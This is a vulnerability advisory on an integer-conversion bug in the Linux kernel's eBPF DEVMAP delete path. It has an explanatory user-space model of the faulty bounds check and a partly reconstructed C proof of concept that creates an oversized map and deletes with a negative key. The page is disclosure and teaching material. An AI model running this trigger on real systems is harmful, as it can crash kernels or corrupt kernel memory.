**security-research** Public
# Integer Overflow in eBPF DEVMAP map_delete_elem Leads to Out-of-Bounds
## Package
## Affected versions
## Patched versions
## Description
### Summary
XDP and AF_XDP sockets provide a high-performance mechanism for packet processing within the kernel, and `BPF_MAP_TYPE_DEVMAP` maps hold the net devices that XDP programs redirect packets to. This bug report describes an integer overflow (signed/unsigned confusion) in the `dev_map_delete_elem` function that handles deletion from eBPF DEVMAP maps, potentially leading to an out-of-bounds write and subsequent security risks.
### Severity
Moderate – An attacker who can trigger the out-of-bounds access could hijack the control flow of the kernel and execute arbitrary code with kernel privileges, or crash the kernel (denial of service).
### Proof of Concept
In the `dev_map_delete_elem` function an unsigned integer (`map->max_entries`) is compared with a user-controlled signed integer (`k`, the map key read into an `int`). Under C's usual arithmetic conversions `k` is converted to unsigned for the comparison, so a negative `k` becomes a value of at least 0x80000000; if `map->max_entries` is larger than that, the intended bounds check passes:
```
if (k >= map->max_entries) return -EINVAL;
```
This allows `k` to hold a negative value (with `max_entries = 0x80000002` only -2147483648 and -2147483647 pass; with `max_entries` close to 0xFFFFFFFF anything from -2147483648 up to -2 does). The signed `k` is then used as an array index in `dtab->netdev_map[k]`, which results in an out-of-bounds access below the start of the array.
```
old_dev = unrcu_pointer(xchg(&dtab->netdev_map[k], NULL));
if (old_dev) {
	call_rcu(&old_dev->rcu, __dev_map_entry_free);
	atomic_dec((atomic_t *)&dtab->items);
}
```
The `xchg` operation writes `NULL` to the out-of-bounds slot, and whatever stale pointer it returns as `old_dev` is then passed to `__dev_map_entry_free` via `call_rcu`, which can lead to further memory corruption. Two practical caveats: with `max_entries = 0x80000002` the accepted negative keys place the write 2^31 slots (16 GiB on a 64-bit kernel) below the array base, which on most systems lands in unmapped memory and produces a kernel oops rather than a controlled write; and the map itself needs `max_entries * sizeof(pointer)` bytes of kernel memory (again about 16 GiB), so map creation fails with `ENOMEM` on machines without that much free memory. Creating a DEVMAP also requires `CAP_NET_ADMIN`.
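To make the conversion concrete, the following is an added user-space model of the check and the index computation in `dev_map_delete_elem` (example code written for this page, not kernel source). It assumes a 64-bit kernel where one `netdev_map` slot is 8 bytes and a two's-complement `int`. `vulnerable_access` keeps the key as `int`, as the advisory describes; `fixed_access` keeps it as `u32`, which passes the same comparison but indexes inside the allocated array. `negative_keys_accepted` counts how many negative keys slip through for a given `max_entries`, reproducing the ranges quoted above.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

typedef unsigned int u32;   /* kernel-style alias */
#define PTR_SIZE 8LL        /* assumption: 64-bit kernel, one netdev_map slot is 8 bytes */

/* Model of the vulnerable path: the key is read into an int, and that int is
 * used both in the bounds check (where it is promoted to unsigned) and as the
 * array index (where it stays signed). Returns true when the check passes and
 * stores the byte offset from the start of netdev_map that the xchg touches. */
bool vulnerable_access(u32 raw_key, u32 max_entries, long long *byte_offset)
{
    int k = (int)raw_key;            /* int k = *(u32 *)key; negative for raw_key >= 0x80000000 */
    if (k >= max_entries)            /* k is converted to u32 for this comparison only */
        return false;                /* -EINVAL */
    *byte_offset = (long long)k * PTR_SIZE;   /* &netdev_map[k] with a signed k */
    return true;
}

/* Same path with the key kept unsigned throughout (hardened form). */
bool fixed_access(u32 raw_key, u32 max_entries, long long *byte_offset)
{
    u32 k = raw_key;
    if (k >= max_entries)
        return false;
    *byte_offset = (long long)k * PTR_SIZE;
    return true;
}

/* True when the offset lies inside an array of max_entries pointer slots. */
bool offset_in_bounds(long long byte_offset, u32 max_entries)
{
    return byte_offset >= 0 && byte_offset < (long long)max_entries * PTR_SIZE;
}

/* Number of distinct negative keys the vulnerable check accepts: every raw key
 * in [0x80000000, max_entries) is negative once read as int. */
unsigned long long negative_keys_accepted(u32 max_entries)
{
    return max_entries > 0x80000000u ? max_entries - 0x80000000u : 0;
}

int main(void)
{
    u32 max_entries = 0x80000002u;   /* same size the PoC below creates */
    u32 raw_key = 0x80000000u;       /* INT_MIN once read as int */
    long long off;

    if (vulnerable_access(raw_key, max_entries, &off))
        printf("vulnerable: check passed, offset %lld bytes, in bounds: %d\n",
               off, offset_in_bounds(off, max_entries));
    if (fixed_access(raw_key, max_entries, &off))
        printf("fixed:      check passed, offset %lld bytes, in bounds: %d\n",
               off, offset_in_bounds(off, max_entries));
    printf("negative keys accepted with max_entries=0x%x: %llu\n",
           max_entries, negative_keys_accepted(max_entries));
    printf("negative keys accepted with max_entries=0xffffffff: %llu\n",
           negative_keys_accepted(0xffffffffu));
    return 0;
}
```

The two functions disagree only on the index, not on the check: for raw key 0x80000000 both accept the key, but the signed path lands 16 GiB below the array while the unsigned path lands on a valid slot. That is why reading the key as `u32` (or bounds-checking the value actually used as the index) closes the bug.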
```c
// compile with gcc -o map_poc map_poc.c -lbpf
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/syscall.h>
#include <linux/bpf.h>

int main()
{
    // Create a large enough BPF DEVMAP map: max_entries above 0x80000000 so
    // that a key which is negative as int still passes the unsigned comparison
    int map_fd;
    union bpf_attr create_attr = {
        .map_type = BPF_MAP_TYPE_DEVMAP,
        .key_size = sizeof(int),
        .value_size = sizeof(int),
        .max_entries = 0x80000000 + 2,
    };
    map_fd = syscall(SYS_bpf, BPF_MAP_CREATE, &create_attr, sizeof(create_attr));
    if (map_fd < 0) {
        perror("BPF_MAP_CREATE");
        return 1;
    }

    // The original PoC is truncated at this point; the trigger below is
    // reconstructed from the description above: delete with a key that is
    // negative when read as int (0x80000000 == -2147483648)
    int key = (int)0x80000000;
    union bpf_attr delete_attr = {
        .map_fd = map_fd,
        .key = (__u64)(unsigned long)&key,
    };
    if (syscall(SYS_bpf, BPF_MAP_DELETE_ELEM, &delete_attr, sizeof(delete_attr)) < 0)
        perror("BPF_MAP_DELETE_ELEM");

    close(map_fd);
    return 0;
}
```